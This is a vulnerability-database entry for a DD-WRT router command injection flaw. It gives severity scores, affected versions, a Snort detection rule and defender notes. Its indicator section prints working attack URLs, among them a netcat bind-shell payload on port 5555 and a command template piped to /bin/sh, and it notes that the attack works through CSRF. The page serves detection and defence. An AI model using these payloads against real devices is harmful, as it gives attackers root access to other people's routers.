cbcvebase.
CVE-2009-2765
published 2009-08-14

CVE-2009-2765: httpd.c in httpd in the management GUI in DD-WRT 24 sp1, and other versions before build 12533, allows remote attackers to execute arbitrary commands via shell…

PriorityP180high8.3CVSS 2.0
AVAACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
82.50%
99.6th percentile
httpd.c in httpd in the management GUI in DD-WRT 24 sp1, and other versions before build 12533, allows remote attackers to execute arbitrary commands via shell metacharacters in a request to a cgi-bin/ URI.

Affected

1 ranges
VendorProductVersion rangeFixed in
dd-wrtdd-wrt<= 24

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://routerIP/cgi-bin/;command_to_execute
urlhttp://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
port5555
path/cgi-bin/;
path/tmp/exec.tmp
commandecho${IFS}-ne${IFS}"#{cmd}"|/bin/sh&
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER Possible DD-WRT Metacharacter Injection Command Execution Attempt"; flow:established,to_server; http.uri; content:"/cgi-bin/|3B|"; nocase; pcre:"/\x2Fcgi\x2Dbin\x2F\x3B.+[a-z]/i"; reference:url,isc.sans.org/diary.html?storyid=6853; reference:url,www.theregister.co.uk/2009/07/21/critical_ddwrt_router_vuln/; reference:url,www.dd-wrt.com/phpBB2/viewtopic.php?t=55173; reference:bid,35742; reference:cve,2009-2765; classtype:attempted-admin; sid:2009678; rev:10; metadata:created_at 2010_07_30, cve CVE_2009_2765, confidence Medium, signature_severity Major, updated_at 2024_03_06;)
  • Detect HTTP GET requests to paths matching /cgi-bin/; (semicolon immediately after cgi-bin/) — the semicolon is the shell metacharacter injection point. In network traffic this appears as the URL-encoded byte 0x3B (|3B|) following /cgi-bin/.
  • Whitespace in injected commands is replaced with the shell variable $IFS to bypass simple space-based filters; look for $IFS in HTTP URI fields as a strong indicator of exploitation.
  • The exploit payload pattern echo${IFS}-ne${IFS} piped to /bin/sh in the URI is a reliable indicator of the Metasploit module's encoded command execution technique.
  • The vulnerability is exploitable via CSRF — a crafted img tag or link on a third-party page can trigger the attack against a DD-WRT router owner without requiring an authenticated session.
  • The httpd process runs as root on affected DD-WRT devices; any successful command injection via /cgi-bin/; results in immediate root-level code execution.
  • The exploit writes a temporary shell script to /tmp/exec.tmp before execution; presence of this file on a DD-WRT device may indicate post-exploitation activity.
  • ·By default, DD-WRT's httpd does not listen on the WAN (outbound) interface, limiting direct remote exploitation; however, CSRF-based attacks bypass this restriction entirely.
  • ·The vulnerability affects DD-WRT 24 sp1 and all builds prior to build 12533; detections should be scoped to devices running firmware older than build 12533.
  • ·The Metasploit module requires a payload compatible with 'generic netcat-e'; other payload types may not function correctly against this target.

CVSS provenance

nvdv2.08.3HIGHAV:A/AC:L/Au:N/C:C/I:C/A:C
vulncheck8.3HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.